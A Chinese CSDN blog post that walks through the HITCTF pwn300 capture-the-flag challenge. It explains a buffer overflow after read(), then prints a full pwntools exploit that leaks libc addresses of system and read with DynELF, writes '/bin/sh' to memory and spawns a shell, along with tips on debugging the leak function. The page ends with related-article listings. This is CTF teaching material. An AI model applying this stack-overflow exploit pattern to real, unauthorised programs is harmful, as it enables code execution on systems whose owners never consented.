HITCTF PWN300--dynelf

最新推荐文章于 2023-09-16 23:52:06 发布
最新推荐文章于 2023-09-16 23:52:06 发布
阅读量1k 收藏 1
点赞数
分类专栏: CTF 文章标签: CTF PWN PWNTOOLS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29947311/article/details/69701112
版权

第一次用Dynelf,脚本调了一下午。。

hitctf pwn300

题目链接:http://pan.baidu.com/s/1eSCCOE2

漏洞分析:三个write之前的一个函数调用了read来读入字符,而这里存在明显的缓冲区溢出,可以覆盖main函数的栈地址,这个题没给libc,got表里没有system之类的函数,于是考虑用dynelf。

攻击脚本:

from pwn import *
io = process("./pwn300")

writeplt = 0x80483E0
start_addr = 0x08048400
data_w = 0x0804A030
readplt = 0x8048390

def leak(addr):
    payload = "a" * 0x1A + p32(writeplt) + p32(start_addr) +p32(1) + p32(addr) + p32(4)
    io.sendline(payload)
    io.recvuntil(p32(4))
    io.recv(1)
    data = io.recv(4)
    print "%#x => %s"%(addr,repr(data))
    return data

dynelf = DynELF(leak,elf = ELF("./pwn300"))
sys_addr = dynelf.lookup("system","libc")
read_addr = dynelf.lookup("read","libc")
print "sys_addr:" + hex(sys_addr)
print "read_addr:"+hex(read_addr)
payload1  = "a" * 0x1A + p32(start_addr)
io.sendline(payload1)
payload2 = "a" * 0x1A + p32(read_addr) + p32(start_addr) + p32(0) + p32(data_w) + p32(8)
io.sendline(payload2)
io.send("/bin/sh\x00")
payload3 = "a" * 0x1A + p32(sys_addr) + p32(start_addr) +p32(data_w)
io.sendline(payload3)
io.interactive()

脚本看起来很简单,但是博主调了一下午。。。主要原因是我原来的leak是这样的:

def leak(addr):
    payload = "a" * 0x1A + p32(writeplt) + p32(start_addr) +p32(1) + p32(addr) + p32(4)
    io.sendline(payload)
    io.recvline()
    io.recvuntil("\n")
    data = io.recv(4)
    print "%#x => %s"%(addr,repr(data))

乍一看好像没什么毛病,一跑起来就有问题了:

首先,没return data

然后这个recvuntil(“\n”)是有问题的,因为这个程序是会截断”\r”(ascii码为0x0D)的,dynelf在检测got表时可能会输入含有0d这样的字节,这样我们的payload就会被截断,导致后面的leak雪崩式错误。(由于不清楚dynelf是怎么找got表的,这个leak有时可以有时不行,所以这个bug不好复现)

总之,写leak函数的注意以下几点:

1.不要忘记return data,这个data在32位机上是4个字节
2.算清楚recv(),recvuntil()的长度,否则程序一跑起来就容易报EOF的错误
3.尽量避免找有交互的函数作为leak点

这篇文章讲dynelf讲的很好:http://bobao.360.cn/learning/detail/3298.html

Vccxx
关注
专栏目录
pwn libc之Dynelf工具
清霂的博客
04-02 535
目录pwn-100pwn-200welpwn Dynelf工具可以根据泄露出的地址找到相应libc版本的其他函数地址,但缺点时不能查找字符串也就是"/bin/sh"的地址,所以找到system函数后,往往还需要找到一个可写的地方用read函数读取"/bin/sh" pwn-100 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="amd64", log_level="debug") contentt = 1 #elf e
pwntoolsDynELF使用
weixin_41038905的博客
04-19 888
DynELFpwntools中专门用来应对没有libc情况的漏洞利用模块,在提供一个目标程序任意地址内存泄漏函数的情况下,可以解析任意加载库的任意符号地址。 libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 本文exp以攻防世界中的pwn-100为例 from pwn import * p = process('./pwn-100...
DynELF
钞sir的博客
01-29 6236
我用三生的期许 换回三世相思雨 三千浮沉里的你 迷失轮回的自己
DynELFpwn200
weixin_44464829的博客
11-15 211
在做漏洞利用时,由于 ASLR 的影响,我们在获取某些函数地址的时候,需要一些特殊的操作。一种方法是先泄露出 libc.so 中的某个函数,然后根据函数之间的偏移,计算得到我们需要的函数地址,这种方法的局限性在于我们需要能找到和目标服务器上一样的 libc.so,而有些特殊情况下往往并不能找到。而另一种方法,利用如 pwntoolsDynELF 模块,对内存进行搜索,直接得到我们需要的函数地址。 DynELFpwntools中专门用来应对无libc情况的漏洞利用模块,其基本代码框架如下。 p.
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4225
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
Pwn-栈溢出之DynELF
CharlesGodX的博客
03-08 911
0x00:前言 DynELF方法适用于没有libc的情况,我们可以通过DynELF方法来实现泄露system函数的地址,那么DynELF是什么呢?在pwntools官方文档有介绍,简单而言就是通过leak方法反复进入main函数中查询libc中的内容,其代码框架如下 p = process('./xxx') def leak(address): payload = "xxxxxxxx" + a...
2017湖湘杯pwn300的wp
一个码农的笔记
12-03 1092
湖湘杯的pwn比赛很有趣,我做了pwn300的题目,感觉不错,我把wp分享出来,pwns的下载链接是:http://download.csdn.net/download/niexinming/10143408 把pwn300直接拖入ida中: main函数: add函数: 这个题目很有意思,首先开辟一个3到255大小的堆空间,然后做加减乘除的计算之后把计算结果放入堆中,最后可以把所有
pwntoolsDynELF函数使用小结
PLpa的博客
09-01 1703
DynELF函数 0x00.前言 当我们在使用ROP做题目的时候,发现题目并没有给出libc.so文件(或者libc.so直接给错),这就让一部分人犯了难,这个问题怎么解决嘞?这里,我们介绍一种不需要给出libc.so实体文件,我们直接从库里匹配libc.so的方法——pwntools中的DynELF函数。 0x01.使用条件 既然我们要使用这个函数,我们就必须知道这个函数使用起来要什么条件。 要...
[PWN] jarvisoj_level4 DynELF()函数使用总结
最新发布
LDX的博客
09-16 121
DynELF使用技巧和示例
DynELF的原理及应用
Sakura给爷pwn全场
03-29 583
PwntoolsDynELF原理探究: https://www.freebuf.com/articles/system/193646.html
DynELF模块和通用gadget实现libc通杀(详细注释)
weixin_48066554的博客
06-22 774
DynELF模块和通用gadget实现libc通杀(详细注释) 文章目录用DynELF模块和通用gadget实现libc通杀(详细注释)泄露libc版本方式x86版本x64版本万能gadgetret2libcx86版本x64版本 泄露libc版本方式 主要原理:利用栈溢出等写入栈的手段调用write或者puts函数,并控制write或puts函数参数泄露libc函数真实地址 write函数特点:可以控制大小,但是在64位程序中需要使用gadget进行寄存器传参,有时可能碰不到合适gadget puts函
HITCTF2022-WEB2-easypop
weixin_43610673的博客
12-01 698
f::ev1l 函数那的判断用浮点数精度绕过。还有一段正则过滤要处理。
XDCTF PWN300&400 Writeup
这里没人
05-14 733
打了2天的XDCTF,被Reverse的题目教做人了。Sad (T.T) 到是pwn的题目基本打通了,除了最简单的pwn100 (T.T) pwn300pwn400比较简单,所以writeup我就放在一起了。 PWN300 做完PWN300,感觉不会再有女朋友了T.T 就不吐槽猥琐的出题人了,直接开始分析程序。 checksec后发现竟然没有开nx,直接shellcode...
安天杯HIT CTF 赛后总结
格兰芬多没有阴天的博客
11-22 997
赛题详情: 本次比赛是赛题与AWD结合的形式,进行网络攻防的同时会陆续放出题目。 AWD的时间为8小时,也就是周六一整天,第一天放出了所有的赛题,周日一上午就用来解答赛题(周六跟周日都可以提交赛题结果)。 AWD模式: 共有四个服务器,全部都是linux操作系统,拥有用户的权限均为普通用户。 两个布置成pwn服务器,两个为web服务器。 首先对web服务器采取了指纹,发现为第一个为dmz的CMS,...
pwn栈溢出之dltest(DynELF和libcSearcher利用)
weixin_44113469的博客
02-15 1260
栈溢出dltest解题步骤 思路分析:观察源码,是个栈溢出。没有system函数,也没有给libc库,但有read函数和write函数。可以借助DynELF泄露函数地址,定为system地址,然后借助read函数写入“/bin/sh”,并调用执行system(“/bin/sh”) 0x01 ...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值